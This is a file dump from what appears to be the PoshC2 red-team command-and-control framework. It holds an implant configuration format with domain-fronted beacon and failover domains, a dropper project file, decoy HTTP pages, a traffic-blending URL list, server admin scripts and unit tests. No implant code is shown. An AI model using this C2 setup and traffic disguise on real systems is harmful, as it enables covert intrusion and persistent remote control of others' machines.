RetriesEnabled;RetryLimit;StageWaitTime;DomainCheck;ProxyUrl;ProxyUser;ProxyPass;UserAgent;HttpReferrer;KillDate;UrlId;FailoverDomain1,FailoverHostHeader1:FailoverDomain2,FailoverHostHeader2;BeaconDomain1,BeaconHostHeader1:BeaconDomain2,BeaconHostHeader2;/url/1:/url/2;RandomUri;StageUrl;Images;Sleep;Jitter;Key 16 | ``` 17 | 18 | E.g.: 19 | 20 | ``` 21 | true;10;30;BLOREBANK;;;;Base64EncodedUserAgent;;2022-10-10;1;https://blorebank.com:8080,asdf.azureedge.net-https://test.blorebank.com,asdf2.azureedge.net;http://beacon.blorebank.com,;/test1:/test2:/test3;image1,image2;randomuri;/stage;30;0.6;key 22 | ``` -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/sharp_dropper.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {D04EC694-31D4-4075-9E29-1650D6477AD3} 8 | Exe 9 | Properties 10 | 11 | System.Config.Manager 12 | v4.5.1 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE;PBIND;HTTP;FCOMM 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE;HTTP 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/sharp_dropper.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sharp_dropper", "sharp_dropper.csproj", "{D04EC694-31D4-4075-9E29-1650D6477AD3}" 4 | EndProject 5 | Global 6 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 7 | Debug|Any CPU = Debug|Any CPU 8 | Release|Any CPU = Release|Any CPU 9 | EndGlobalSection 10 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 11 | {D04EC694-31D4-4075-9E29-1650D6477AD3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 12 | {D04EC694-31D4-4075-9E29-1650D6477AD3}.Debug|Any CPU.Build.0 = Debug|Any CPU 13 | {D04EC694-31D4-4075-9E29-1650D6477AD3}.Release|Any CPU.ActiveCfg = Release|Any CPU 14 | {D04EC694-31D4-4075-9E29-1650D6477AD3}.Release|Any CPU.Build.0 = Release|Any CPU 15 | EndGlobalSection 16 | EndGlobal 17 | -------------------------------------------------------------------------------- /resources/payload-templates/stage2core.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/payload-templates/stage2core.so -------------------------------------------------------------------------------- /resources/responses/200_response1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | #RANDOMDATA# 9 | 10 | -------------------------------------------------------------------------------- /resources/responses/200_response2.html: -------------------------------------------------------------------------------- 1 | 2 | Welcome 3 | #RANDOMDATA# 4 |
5 |
6 | 7 | -------------------------------------------------------------------------------- /resources/responses/200_response3.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | #RANDOMDATA# 7 |
8 | -------------------------------------------------------------------------------- /resources/responses/200_response4.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | #RANDOMDATA# 4 | Jani 5 | #RANDOMDATA# 6 | Microsoft.XML.Parser 7 | -------------------------------------------------------------------------------- /resources/responses/200_response5.html: -------------------------------------------------------------------------------- 1 | 2 | #RANDOMDATA# 3 |
#RANDOMDATA#
4 | 17 | 18 | -------------------------------------------------------------------------------- /resources/responses/200_response6.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Bloodroot 5 | Sanguinaria canadensis 6 | 4 7 | Mostly Shady 8 | $2.44 9 | #RANDOMDATA# 10 | 11 | 12 | Columbine 13 | Aquilegia canadensis 14 | 3 15 | Mostly Shady 16 | $9.37 17 | #RANDOMDATA# 18 | 19 | 20 | Marsh Marigold 21 | Caltha palustris 22 | 4 23 | Mostly Sunny 24 | $6.81 25 | #RANDOMDATA# 26 | 27 | 28 | Cowslip 29 | Caltha palustris 30 | 4 31 | Mostly Shady 32 | $9.90 33 | #RANDOMDATA# 34 | 35 | -------------------------------------------------------------------------------- /resources/responses/404_response.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 |

Not Found

6 |

The requested URL was not found on this server.

7 |
8 |
IIS ASP.NET 2.0.43451 Server
9 | 10 | -------------------------------------------------------------------------------- /resources/scripts/_posh-common: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | check_if_mac(){ 4 | if [ "$(uname)" == "Darwin" ]; then 5 | IS_MAC=true 6 | else 7 | IS_MAC=false 8 | fi 9 | } 10 | 11 | get_posh_projects_dir(){ 12 | check_if_mac 13 | if [ "$IS_MAC" = true ]; then 14 | POSH_PROJECTS_DIR="/private/var/poshc2" 15 | else 16 | POSH_PROJECTS_DIR="/var/poshc2" 17 | fi 18 | } 19 | 20 | get_docker_posh_projects_dir(){ 21 | DOCKER_POSH_PROJECTS_DIR="/var/poshc2" 22 | } 23 | 24 | get_posh_dir() { 25 | check_if_mac 26 | if [ "$IS_MAC" = true ]; then 27 | SCRIPT_LOCATION=`readlink -n $0` 28 | if [ -z "$SCRIPT_LOCATION" ]; then 29 | echo "In Docker install, using POSHC2_INSTALL_DIR environment variable for PoshC2 installation directory" 30 | echo "This is only required if developing with Docker." 31 | POSH_DIR="$POSHC2_INSTALL_DIR" 32 | if [ -z "$POSH_DIR" ]; then 33 | echo "POSHC2_INSTALL_DIR environment variable not set, defaulting to /opt/PoshC2" 34 | POSH_DIR="/opt/PoshC2" 35 | else 36 | echo "POSH_DIR set to $POSH_DIR" 37 | return 38 | fi 39 | fi 40 | POSH_DIR="`dirname $SCRIPT_LOCATION`/../../" 41 | else 42 | SCRIPT_LOCATION=`readlink -f -n $0` 43 | POSH_DIR="`dirname $SCRIPT_LOCATION`/../../" 44 | fi 45 | } 46 | 47 | get_posh_project(){ 48 | get_posh_projects_dir 49 | POSH_PROJECT=`cat $POSH_PROJECTS_DIR/CURRENT_PROJECT 2>/dev/null` 50 | if [ -z "$POSH_PROJECT" ]; then 51 | echo "No PoshC2 project set, please run posh-project" 52 | exit 1 53 | fi 54 | } 55 | 56 | get_posh_project_dir(){ 57 | get_posh_projects_dir 58 | get_posh_project 59 | POSH_PROJECT_DIR="$POSH_PROJECTS_DIR/$POSH_PROJECT" 60 | if [ ! -d "$POSH_PROJECT_DIR" ]; then 61 | echo "No PoshC2 project directory, please run posh-project" 62 | exit 1 63 | fi 64 | } 65 | 66 | get_docker_image_name(){ 67 | DOCKER_IMAGE_NAME="m0rv4i/poshc2" 68 | } 69 | -------------------------------------------------------------------------------- /resources/scripts/fpc: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 | get_posh_project_dir 14 | 15 | DATABASE_TYPE=`cat $POSH_PROJECT_DIR/config.yml | grep "DatabaseType: " | cut -d "\"" -f 2` 16 | DATABASE_STRING=`cat $POSH_PROJECT_DIR/config.yml | grep "PostgresConnectionString: " | cut -d "\"" -f 2` 17 | 18 | pushd "$POSH_DIR" >/dev/null 19 | 20 | if [ "$?" -eq "0" ]; then 21 | python3 -m pipenv run python3 "resources/scripts/fpc.py" -p "$POSH_PROJECT_DIR" -d "$DATABASE_TYPE" -pg "$DATABASE_STRING" $@ 22 | popd > /dev/null 23 | fi 24 | -------------------------------------------------------------------------------- /resources/scripts/posh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd >/dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 | 14 | pushd "$POSH_DIR" >/dev/null 15 | 16 | if [ "$?" -eq "0" ]; then 17 | sudo python3 -m pipenv run python3 start.py --client "$@" 18 | popd > /dev/null 19 | fi 20 | -------------------------------------------------------------------------------- /resources/scripts/posh-api-server: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 | get_posh_project_dir 14 | 15 | pushd $POSH_DIR >/dev/null 16 | if [ "$?" -eq "0" ]; then 17 | 18 | sudo python3 -m pipenv run python3 -u start_api.py --server 2>&1 | sudo tee -a "$POSH_PROJECT_DIR/poshc2_api_server.log" 19 | popd > /dev/null 20 | fi 21 | -------------------------------------------------------------------------------- /resources/scripts/posh-config: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_project_dir 5 | 6 | if [[ "$EDITOR" != "" ]]; then 7 | sudo $EDITOR "$POSH_PROJECT_DIR/config.yml" 8 | elif [[ "$*" == *"--nano"* ]]; then 9 | sudo nano "$POSH_PROJECT_DIR/config.yml" 10 | else 11 | sudo vim "$POSH_PROJECT_DIR/config.yml" 12 | fi 13 | -------------------------------------------------------------------------------- /resources/scripts/posh-cookie-decrypter: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 | 14 | pushd $POSH_DIR >/dev/null 15 | if [ "$?" -eq "0" ]; then 16 | 17 | sudo python3 -m pipenv run python3 "$POSH_DIR/cookie_decrypter.py" 18 | popd > /dev/null 19 | 20 | fi 21 | 22 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_projects_dir 5 | get_docker_posh_projects_dir 6 | get_docker_image_name 7 | 8 | show_help(){ 9 | echo "*** PoshC2 Docker Implant Handler ***" 10 | echo "Usage:" 11 | echo "posh -t -u " 12 | echo "" 13 | echo "Default Docker tag is latest (master)" 14 | } 15 | 16 | DOCKER_TAG="latest" 17 | USER="" 18 | DEV="" 19 | 20 | while getopts "h?t:u:d" opt; do 21 | case "$opt" in 22 | h|\?) 23 | show_help 24 | exit 0 25 | ;; 26 | t) DOCKER_TAG="$OPTARG" 27 | ;; 28 | u) USER="$OPTARG" 29 | ;; 30 | d) DEV="-v /opt/PoshC2:/opt/PoshC2" 31 | ;; 32 | esac 33 | done 34 | 35 | if [ ! -z "$USER" ]; then 36 | sudo -E docker run -ti -l posh-client --rm -v "$POSH_PROJECTS_DIR:$DOCKER_POSH_PROJECTS_DIR" $DEV "$DOCKER_IMAGE_NAME":"$DOCKER_TAG" /usr/local/bin/posh -u "$USER" 37 | else 38 | sudo -E docker run -ti -l posh-client --rm -v "$POSH_PROJECTS_DIR:$DOCKER_POSH_PROJECTS_DIR" $DEV "$DOCKER_IMAGE_NAME":"$DOCKER_TAG" /usr/local/bin/posh 39 | fi 40 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker-build: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 | get_docker_image_name 14 | 15 | pushd "$POSH_DIR" >/dev/null 16 | 17 | if [ "$?" -eq "0" ]; then 18 | posh-docker-clean 19 | sudo -E docker build -t "$DOCKER_IMAGE_NAME" . "$@" 20 | popd > /dev/null 21 | fi 22 | 23 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker-clean: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Do a full docker system prune, cleaning up all unused images & containers?" 4 | echo "*** This includes anything none-PoshC2 related. ***" 5 | read -p "Would you like to do a clean? y/N " -n 1 -r 6 | echo "" 7 | if [[ "$REPLY" =~ ^[Yy]$ ]] 8 | then 9 | sudo -E docker system prune -f 10 | fi 11 | 12 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker-debug: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_projects_dir 5 | get_docker_posh_projects_dir 6 | get_docker_image_name 7 | 8 | show_help(){ 9 | echo "*** PoshC2 Docker Debug ***" 10 | echo "Usage:" 11 | echo "posh-docker-debug -t " 12 | echo "" 13 | echo "Default Docker tag is latest (master)" 14 | } 15 | 16 | DOCKER_TAG="latest" 17 | 18 | while getopts "h?t:" opt; do 19 | case "$opt" in 20 | h|\?) 21 | show_help 22 | exit 0 23 | ;; 24 | t) DOCKER_TAG="$OPTARG" 25 | ;; 26 | esac 27 | done 28 | 29 | sudo -E docker run -ti --rm -v "$POSH_PROJECTS_DIR:$DOCKER_POSH_PROJECTS_DIR" "$DOCKER_IMAGE_NAME":"$DOCKER_TAG" /bin/bash 30 | 31 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker-server: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_project_dir 5 | get_posh_projects_dir 6 | get_docker_posh_projects_dir 7 | get_docker_image_name 8 | 9 | sudo chmod -R a+rwx $POSH_PROJECT_DIR 10 | 11 | POSHC2_PORT=`cat $POSH_PROJECT_DIR/config.yml | grep "BindPort: " | grep -o -e "[0-9]\+"` 12 | 13 | show_help(){ 14 | echo "*** PoshC2 Docker Server ***" 15 | echo "Usage:" 16 | echo "posh-server -t " 17 | echo "" 18 | echo "Default Docker tag is latest (master)" 19 | } 20 | 21 | DOCKER_TAG="latest" 22 | 23 | while getopts "h?t:d" opt; do 24 | case "$opt" in 25 | h|\?) 26 | show_help 27 | exit 0 28 | ;; 29 | t) DOCKER_TAG="$OPTARG" 30 | ;; 31 | d) DEV="-v /opt/PoshC2:/opt/PoshC2" 32 | ;; 33 | esac 34 | done 35 | 36 | sudo -E docker run --rm -l posh-server -p "$POSHC2_PORT:$POSHC2_PORT" -v "$POSH_PROJECTS_DIR:$DOCKER_POSH_PROJECTS_DIR" $DEV "$DOCKER_IMAGE_NAME":"$DOCKER_TAG" /usr/local/bin/posh-server 37 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker-stop-server: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_docker_image_name 5 | 6 | echo "[*] Stopping the PoshC2 server Docker container..." 7 | CONTAINER=`sudo docker ps -q -f label=posh-server -f ancestor=$DOCKER_IMAGE_NAME` 8 | if [ ! -z "$CONTAINER" ]; then 9 | sudo docker stop "$CONTAINER" >/dev/null 10 | echo "[+] Done" 11 | else 12 | echo "[*] No running PoshC2 server containers found" 13 | fi -------------------------------------------------------------------------------- /resources/scripts/posh-log: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_project_dir 5 | 6 | tail -n 5000 -f "$POSH_PROJECT_DIR/poshc2_server.log" 2>/dev/null\ 7 | || ( echo -e "\e[31m[!] Could not open logfile: "$POSH_PROJECT_DIR/poshc2_server.log"\e[0m") 8 | 9 | -------------------------------------------------------------------------------- /resources/scripts/posh-server: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 | get_posh_project_dir 14 | 15 | pushd $POSH_DIR >/dev/null 16 | if [ "$?" -eq "0" ]; then 17 | 18 | sudo python3 -m pipenv run python3 -u start.py --server 2>&1 | sudo tee -a "$POSH_PROJECT_DIR/poshc2_server.log" 19 | popd > /dev/null 20 | fi 21 | -------------------------------------------------------------------------------- /resources/scripts/posh-service: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_project_dir 5 | 6 | sudo systemctl enable poshc2.api.service >/dev/null 7 | sudo systemctl restart poshc2.api.service >/dev/null 8 | while [[ $x -le 10 ]]; do 9 | if [ -f "$POSH_PROJECT_DIR/poshc2_api_server.log" ]; then 10 | break; 11 | fi 12 | sleep 1s 13 | x=$(( $x + 1 )) 14 | done 15 | 16 | sudo systemctl enable poshc2.service >/dev/null 17 | sudo systemctl restart poshc2.service >/dev/null 18 | while [[ $x -le 10 ]]; do 19 | if [ -f "$POSH_PROJECT_DIR/poshc2_server.log" ]; then 20 | break; 21 | fi 22 | sleep 1s 23 | x=$(( $x + 1 )) 24 | done 25 | /usr/local/bin/posh-log 26 | 27 | -------------------------------------------------------------------------------- /resources/scripts/posh-service-ansible: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_project_dir 5 | 6 | sudo systemctl enable poshc2.service >/dev/null 7 | sudo systemctl restart poshc2.service >/dev/null 8 | while [[ $x -le 10 ]]; do 9 | if [ -f "$POSH_PROJECT_DIR/poshc2_server.log" ]; then 10 | break; 11 | fi 12 | sleep 1s 13 | x=$(( $x + 1 )) 14 | done 15 | -------------------------------------------------------------------------------- /resources/scripts/posh-stop-service: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | sudo systemctl stop poshc2.service >/dev/null 4 | sudo systemctl disable poshc2.service >/dev/null 5 | 6 | sudo systemctl stop poshc2.api.service >/dev/null 7 | sudo systemctl disable poshc2.api.service >/dev/null 8 | 9 | -------------------------------------------------------------------------------- /resources/scripts/posh-update: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | # A POSIX variable 12 | OPTIND=1 # Reset in case getopts has been used previously in the shell. 13 | 14 | # Initialize our own variables: 15 | GIT_BRANCH="master" 16 | MANUAL_BRANCH_SET=false 17 | SKIP_INSTALL=false 18 | 19 | show_help(){ 20 | echo "*** PoshC2 Update Script ***" 21 | echo "Usage:" 22 | echo "posh-update -b " 23 | echo "posh-update-core -b " 24 | echo "posh-update-core -b -x (Skips running install script)" 25 | echo "" 26 | echo "Default is the master branch" 27 | } 28 | 29 | while getopts "xh?b:" opt; do 30 | case "$opt" in 31 | h|\?) 32 | show_help 33 | exit 0 34 | ;; 35 | b) GIT_BRANCH="$OPTARG" 36 | MANUAL_BRANCH_SET=true 37 | ;; 38 | x) SKIP_INSTALL=true 39 | ;; 40 | esac 41 | done 42 | 43 | 44 | 45 | source /usr/local/bin/_posh-common 46 | get_posh_dir 47 | 48 | pushd $POSH_DIR >/dev/null 49 | 50 | if [ "$?" -eq "0" ]; then 51 | 52 | if [ "$MANUAL_BRANCH_SET" == "false" ]; then 53 | GIT_BRANCH=`git rev-parse --abbrev-ref HEAD` 54 | fi 55 | 56 | echo "" 57 | echo -e """\033[92m 58 | __________ .__. _________ ________ 59 | \_______ \____ _____| |__ \_ ___ \ \_____ \\ 60 | | ___/ _ \/ ___/ | \ / \ \/ / ____/ 61 | | | ( <_> )___ \| Y \ \ \____/ \\ 62 | |____| \____/____ >___| / \______ /\_______ \\ 63 | \/ \/ \/ \/ 64 | ================= www.PoshC2.co.uk ================""" 65 | echo "" 66 | echo "[+] Updating PoshC2" 67 | echo "" 68 | 69 | if [[ $(id -u) -ne 0 ]]; then 70 | echo -e "You must run this installer as root.\nQuitting!"; 71 | exit 1; 72 | fi 73 | 74 | echo "" 75 | echo "[+] Updating Posh Installation to latest $GIT_BRANCH" 76 | git fetch 77 | git reset --hard origin/"$GIT_BRANCH" 78 | 79 | if [ "$SKIP_INSTALL" == "false" ]; then 80 | 81 | echo "" 82 | echo "[+] Running Install script" 83 | ./Install.sh -b "$GIT_BRANCH" -p "$POSH_DIR" 84 | 85 | fi 86 | 87 | echo "" 88 | echo "[+] Update complete" 89 | echo "" 90 | 91 | popd > /dev/null 92 | fi 93 | -------------------------------------------------------------------------------- /resources/scripts/poshc2.api.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=PoshC2 API Server 3 | 4 | [Service] 5 | Type=simple 6 | User=root 7 | ExecStart=/usr/local/bin/posh-api-server 8 | 9 | [Install] 10 | WantedBy=default.target -------------------------------------------------------------------------------- /resources/scripts/poshc2.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=PoshC2 Server 3 | 4 | [Service] 5 | Type=simple 6 | User=root 7 | ExecStart=/usr/local/bin/posh-server 8 | 9 | [Install] 10 | WantedBy=default.target -------------------------------------------------------------------------------- /resources/urls.txt: -------------------------------------------------------------------------------- 1 | /adsense/troubleshooter/1631343/ 2 | /adServingData/PROD/TMClient/6/8736/ 3 | /advanced_search?hl=en-GB&fg= 4 | /async/newtab?ei= 5 | /babel-polyfill/6.3.14/polyfill.min.js= 6 | /bh/sync/aol?rurl=/ups/55972/sync?origin= 7 | /bootstrap/3.1.1/bootstrap.min.js?p= 8 | /branch-locator/search.asp?WT.ac&api= 9 | /business/home.asp&ved= 10 | /business/retail-business/insurance.asp?WT.mc_id= 11 | /cdba?ptv=48&profileId=125&av=1&cb= 12 | /cisben/marketq?bartype=AREA&showheader=FALSE&showvaluemarkers= 13 | /classroom/sharewidget/widget_stable.html?usegapi= 14 | /client_204?&atyp=i&biw=1920&bih=921&ei= 15 | /load/pages/index.php?t= 16 | /putil/2018/0/11/po.html?ved= 17 | /qqzddddd/2018/load.php?lang=en&modules= 18 | /status/995598521343541248/query= 19 | /TOS?loc=GB&hl=en&privacy= 20 | /trader-update/history&pd= 21 | /types/translation/v1/articles/ 22 | /uasclient/0.1.34/modules/ 23 | /usersync/tradedesk/ 24 | /utag/lbg/main/prod/utag.15.js?utv= 25 | /vfe01s/1/vsopts.js? 26 | /vssf/wppo/site/bgroup/visitor/ 27 | /wpaas/load.php?debug=false&lang=en&modules= 28 | /web/20110920084728/ 29 | /webhp?hl=en&sa=X&ved= 30 | /work/embedded/search?oid= 31 | /GoPro5/black/2018/ 32 | /Philips/v902/ -------------------------------------------------------------------------------- /start.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from poshc2 import run 4 | 5 | if __name__ == '__main__': 6 | run() 7 | -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/tests/__init__.py -------------------------------------------------------------------------------- /tests/test_utils.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | 3 | from poshc2.Utils import validate_sleep_time, validate_kill_date 4 | 5 | 6 | def test_validate_sleep_time(): 7 | assert validate_sleep_time("5h") is not None 8 | assert validate_sleep_time("4m") is not None 9 | assert validate_sleep_time("3s ") is not None 10 | assert validate_sleep_time(" 5000h ") is not None 11 | assert validate_sleep_time(" 999 s ") is None 12 | assert validate_sleep_time("999 s") is None 13 | assert validate_sleep_time("999d") is None 14 | assert validate_sleep_time("s") is None 15 | assert validate_sleep_time("asdf") is None 16 | assert validate_sleep_time("") is None 17 | assert validate_sleep_time(None) is None 18 | 19 | 20 | def test_validate_killdate(): 21 | assert not validate_kill_date("0123-45-67") 22 | assert not validate_kill_date("0000-00-0") 23 | assert not validate_kill_date("bad") 24 | assert not validate_kill_date("") 25 | assert not validate_kill_date("2020-01-45") 26 | assert not validate_kill_date("2020-13-01") 27 | assert validate_kill_date("2020-01-01") 28 | assert validate_kill_date(" 2020-01-01 ") 29 | --------------------------------------------------------------------------------